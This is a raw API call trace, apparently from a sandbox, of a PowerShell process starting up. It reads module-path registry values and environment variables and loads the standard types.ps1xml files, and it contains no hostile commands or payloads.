[0077.609] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd408 | out: phkResult=0xcd408*=0x320) returned 0x0
[0077.609] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd38c, lpData=0x0, lpcbData=0xcd388*=0x0 | out: lpType=0xcd38c*=0x2, lpData=0x0, lpcbData=0xcd388*=0x6c) returned 0x0
[0077.609] CoTaskMemAlloc (cb=0x70) returned 0x2fbb10
[0077.609] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd35c, lpData=0x2fbb10, lpcbData=0xcd358*=0x6c | out: lpType=0xcd35c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xcd358*=0x6c) returned 0x0
[0077.610] CoTaskMemFree (pv=0x2fbb10)
[0077.610] CoTaskMemAlloc (cb=0xcc) returned 0x364160
[0077.610] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x364160, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
[0077.610] CoTaskMemFree (pv=0x364160)
[0077.610] CoTaskMemAlloc (cb=0xcc) returned 0x364160
[0077.610] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x364160, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
[0077.610] CoTaskMemFree (pv=0x364160)
[0077.612] RegCloseKey (hKey=0x320) returned 0x0
[0077.612] CoTaskMemAlloc (cb=0xcc) returned 0x364160
[0077.612] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x364160, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
[0077.612] CoTaskMemFree (pv=0x364160)
[0077.612] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd408 | out: phkResult=0xcd408*=0x320) returned 0x0
[0077.612] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd38c, lpData=0x0, lpcbData=0xcd388*=0x0 | out: lpType=0xcd38c*=0x0, lpData=0x0, lpcbData=0xcd388*=0x0) returned 0x2
[0077.612] RegCloseKey (hKey=0x320) returned 0x0
[0077.672] CoTaskMemAlloc (cb=0x20c) returned 0x389a00
[0077.672] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x389a00 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
[0077.673] CoTaskMemFree (pv=0x389a00)
[0077.673] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
[0077.673] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
[0077.694] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.694] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.694] CoTaskMemFree (pv=0x2c78a0)
[0077.695] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.695] CoTaskMemFree (pv=0x2c78a0)
[0077.712] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.712] CoTaskMemFree (pv=0x2c78a0)
[0077.712] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.713] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.713] CoTaskMemFree (pv=0x2c78a0)
[0077.715] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1f8 | out: phkResult=0xcd1f8*=0x328) returned 0x0
[0077.720] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xcd20c, lpData=0x0, lpcbData=0xcd208*=0x0 | out: lpType=0xcd20c*=0x1, lpData=0x0, lpcbData=0xcd208*=0x74) returned 0x0
[0077.720] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xcd17c, lpData=0x0, lpcbData=0xcd178*=0x0 | out: lpType=0xcd17c*=0x1, lpData=0x0, lpcbData=0xcd178*=0x74) returned 0x0
[0077.720] CoTaskMemAlloc (cb=0x78) returned 0x2fbb10
[0077.720] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xcd14c, lpData=0x2fbb10, lpcbData=0xcd148*=0x74 | out: lpType=0xcd14c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd148*=0x74) returned 0x0
[0077.720] CoTaskMemFree (pv=0x2fbb10)
[0077.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
[0077.720] SetErrorMode (uMode=0x1) returned 0x1
[0077.721] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0077.721] SetErrorMode (uMode=0x1) returned 0x1
[0077.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.721] SetErrorMode (uMode=0x1) returned 0x1
[0077.721] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
[0077.722] SetErrorMode (uMode=0x1) returned 0x1
[0077.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0077.723] SetErrorMode (uMode=0x1) returned 0x1
[0077.723] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
[0077.724] SetErrorMode (uMode=0x1) returned 0x1
[0077.724] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.724] CoTaskMemFree (pv=0x2c78a0)
[0077.725] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.725] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.726] CoTaskMemFree (pv=0x2c78a0)
[0077.726] GetACP () returned 0x4e4
[0077.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.730] SetErrorMode (uMode=0x1) returned 0x1
[0077.731] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
[0077.731] GetFileType (hFile=0x32c) returned 0x1
[0077.731] SetErrorMode (uMode=0x1) returned 0x1
[0077.732] GetFileType (hFile=0x32c) returned 0x1
[0077.734] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2d55838*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.748] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2d55838*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.749] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2d55838*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.749] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2d55838*, lpNumberOfBytesRead=0xcd008*=0xcf3, lpOverlapped=0x0) returned 1
[0077.750] ReadFile (in: hFile=0x32c, lpBuffer=0x2d54c93, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2d54c93*, lpNumberOfBytesRead=0xcd008*=0x0, lpOverlapped=0x0) returned 1
[0077.750] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2d55838*, lpNumberOfBytesRead=0xcd008*=0x0, lpOverlapped=0x0) returned 1
[0077.751] CloseHandle (hObject=0x32c) returned 1
[0077.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.764] SetErrorMode (uMode=0x1) returned 0x1
[0077.764] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf80 | out: lpFileInformation=0xccf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
[0077.764] SetErrorMode (uMode=0x1) returned 0x1
[0077.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.765] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd068 | out: phkResult=0xcd068*=0x32c) returned 0x0
[0077.765] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfec, lpData=0x0, lpcbData=0xccfe8*=0x0 | out: lpType=0xccfec*=0x1, lpData=0x0, lpcbData=0xccfe8*=0x56) returned 0x0
[0077.765] CoTaskMemAlloc (cb=0x5a) returned 0x301a50
[0077.765] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfbc, lpData=0x301a50, lpcbData=0xccfb8*=0x56 | out: lpType=0xccfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccfb8*=0x56) returned 0x0
[0077.765] CoTaskMemFree (pv=0x301a50)
[0077.765] RegCloseKey (hKey=0x32c) returned 0x0
[0077.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.827] GetSystemInfo (in: lpSystemInfo=0xcbca0 | out: lpSystemInfo=0xcbca0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03))
[0077.827] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0077.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0077.864] SetErrorMode (uMode=0x1) returned 0x1
[0077.864] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
[0077.865] GetFileType (hFile=0x32c) returned 0x1
[0077.865] SetErrorMode (uMode=0x1) returned 0x1
[0077.865] GetFileType (hFile=0x32c) returned 0x1
[0077.865] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.883] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.894] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.894] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.894] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.895] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.895] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.895] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.895] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.896] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.896] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.905] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.905] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.906] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.906] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.907] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.907] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.908] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.908] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.908] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.908] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.908] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.908] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.909] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.909] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.909] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.909] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.909] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.930] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.930] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.931] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.931] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.931] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.933] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.933] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.933] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.933] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.933] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.934] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.934] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
